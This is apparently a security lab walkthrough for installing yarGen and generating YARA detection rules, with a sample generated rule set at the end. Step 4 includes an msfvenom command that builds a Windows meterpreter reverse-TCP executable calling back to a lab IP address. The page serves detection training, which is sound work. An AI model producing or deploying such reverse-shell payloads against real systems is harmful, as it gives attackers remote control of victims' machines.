yarGen
1. Introduction
yarGen is a generator for YARA rules The main principle is the creation of yara rules from strings found in malware files while removing all strings that also appear in goodware files. Therefore yarGen includes a big goodware strings and opcode database as ZIP archives that have to be extracted before the first use.
Goal of this exercise is to install and use yargen
to create automated yara rules
2. Installation
Please download yarGen.py
using the commands below.
cd /home/hacker
git clone https://github.com/Neo23x0/yarGen.git
cd /home/hacker/yarGen
chmod +x ./yarGen.py
Install dependencies
cd /home/hacker/yarGen
pip install -r requirements.txt

3. Update yargen database
cd /home/hacker/yarGen
./yarGen.py --update

4. Create maliscious binary
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.71.164 LPORT=443 -f exe -o malisciousfile.exe

mkdir -p /tmp/malware
cp malisciousfile.exe /tmp/malware
./yarGen.py -m /tmp/malware
This will generate a yargen_rules.yar
file in the current directory.
Let's test it:
yara -w -r ./yargen_rules.yar /tmp/malware

/*
YARA Rule Set
Author: yarGen Rule Generator
Date: 2022-04-25
Identifier: malware
Reference: https://github.com/Neo23x0/yarGen
*/
/* Rule Set ----------------------------------------------------------------- */
rule malisciousfile {
meta:
description = "malware - file malisciousfile.exe"
author = "yarGen Rule Generator"
reference = "https://github.com/Neo23x0/yarGen"
date = "2022-04-25"
hash1 = "51441af91003497318d9a396eeee7863d228ffc683335e05d669cf998cfae507"
strings:
$s1 = "C:\\local0\\asf\\release\\build-2.2.14\\support\\Release\\ab.pdb" fullword ascii
$s2 = " Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/<br>" fullword ascii
$s3 = " -T content-type Content-type header for POSTing, eg." fullword ascii
$s4 = " -h Display usage information (this message)" fullword ascii
$s5 = " -i Use HEAD instead of GET" fullword ascii
$s6 = " -p postfile File containing data to POST. Remember also to set -T" fullword ascii
$s7 = " This is ApacheBench, Version %s <i><%s></i><br>" fullword ascii
$s8 = " -r Don't exit on socket receive errors." fullword ascii
$s9 = " Licensed to The Apache Software Foundation, http://www.apache.org/<br>" fullword ascii
$s10 = " -k Use HTTP KeepAlive feature" fullword ascii
$s11 = " -X proxy:port Proxyserver and port number to use" fullword ascii
$s12 = " %d%% %5I64d" fullword ascii
$s13 = " -H attribute Add Arbitrary header line, eg. 'Accept-Encoding: gzip'" fullword ascii
$s14 = " -v verbosity How much troubleshooting info to print" fullword ascii
$s15 = " -z attributes String to insert as td or th attributes" fullword ascii
$s16 = " -b windowsize Size of TCP send/receive buffer, in bytes" fullword ascii
$s17 = " -e filename Output CSV file with percentages served" fullword ascii
$s18 = " are a colon separated username and password." fullword ascii
$s19 = " -x attributes String to insert as table attributes" fullword ascii
$s20 = " -y attributes String to insert as tr attributes" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 200KB and
8 of them
}
Last updated
Was this helpful?